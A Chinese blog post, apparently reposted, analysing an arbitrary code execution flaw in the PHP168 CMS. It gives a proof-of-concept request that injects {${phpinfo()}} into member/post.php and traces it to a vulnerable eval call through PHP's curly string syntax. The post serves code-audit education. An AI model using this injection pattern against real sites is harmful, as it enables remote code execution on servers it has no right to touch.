码迷,mamicode.com
首页 > Web开发 > 详细

php 168任意代码执行漏洞之php的Complex (curly) syntax

时间:2019-04-27 13:19:58      阅读:217      评论:0      收藏:0      [点我收藏+]

标签:info   htm   pos   alt   ber   .com   mem   就是   family   

今天了解了php 168的任意代码执行漏洞,Poc:

http://192.168.6.128/pentest/cms/php168/member/post.php
?only=1
&showHtml_Type[bencandy][1]={${phpinfo()}}
&aid=1
&job=endHTML

通过代码审计得知,最后会执行

eval("\$array[showurl]=\"$filename_b\";");

而$filename_b最终值为**{${phpinfo()}}**

关于{${}}这种形式涉及到了php Complex (curly) syntax,

技术图片

通过上图得知,

eval("\$array[showurl]=\"$filename_b\";");

实际上就是执行了phpinfo();

不理解的童鞋,可以去

https://www.php.net/manual/zh/language.types.string.php自行查阅,

另外,除了字符串之外,{${}}还有别的用法,可以创建一个新的变量,

https://stackoverflow.com/questions/14238120/purpose-of-complex-curly-syntax-outside-a-string-representation

欢迎评论区指导与批评。

php 168任意代码执行漏洞之php的Complex (curly) syntax

标签:info   htm   pos   alt   ber   .com   mem   就是   family   

原文地址:https://www.cnblogs.com/danku/p/10778306.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!